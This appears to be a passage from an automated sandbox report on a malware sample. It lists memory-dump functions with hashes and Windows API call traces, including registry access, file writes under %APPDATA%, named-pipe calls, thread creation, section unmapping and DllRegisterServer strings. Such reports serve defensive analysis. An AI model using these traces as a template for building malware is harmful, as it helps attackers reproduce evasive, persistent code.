  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD36B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207 Total matches: 57sleepsynchronization
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
